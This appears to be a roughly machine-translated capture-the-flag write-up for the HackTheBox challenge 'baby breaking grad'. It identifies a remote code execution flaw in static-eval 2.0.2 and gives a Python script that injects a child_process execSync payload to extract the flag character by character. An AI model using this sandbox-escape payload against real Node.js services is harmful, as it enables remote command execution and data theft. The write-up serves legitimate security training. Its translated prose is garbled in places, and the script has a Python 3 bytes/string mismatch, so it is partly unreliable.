summary

HackTheBox Website CTF shooting range Web Related topics baby breaking grad, Title address https://app.hackthebox.com/challenges/baby-breaking-grad, Main investigation AST Injected knowledge points .

subject

Title Overview

After opening the program instance , Prompt to visit 209.97.187.217:32476, visit http://209.97.187.217:32476, See the following Web Interface

Directly select a submission to get

Download the attachment and extract it to get

Source code

stay routes In the catalog index.js in , Including different url Treatment method

It involves StudentHelper.js, Corresponding source code

StudentHelper.js Yes static-eval and esprima, stay package.json See their version in

Their thinking

You can see static-eval by 2.0.2, There is RCE Loophole , For details, please refer to https://github.com/advisories/GHSA-8v27-2fg9-7h62

Solution code

import string
import requests

url = 'http://209.97.187.217:32476/api/calculate'
flag = ''

for i, _ in enumerate(iter(bool, True)):
    for chr in string.printable:
        payload = "(function (x) { return `${eval(\"if(global.process.mainModule.constructor._load('child_process').execSync('cat flag*').toString().charCodeAt(" + str(i) + ") == " + str(ord(chr)) + ") {25} else {1}\")}` })()"

        data = {"name": "AAA", "formula": payload}
        r = requests.post(url, json=data)

        if('Passed' in r.content):
            flag += chr
            print(flag)

            if(chr == '}'):
                quit()

            break

Run code , obtain flag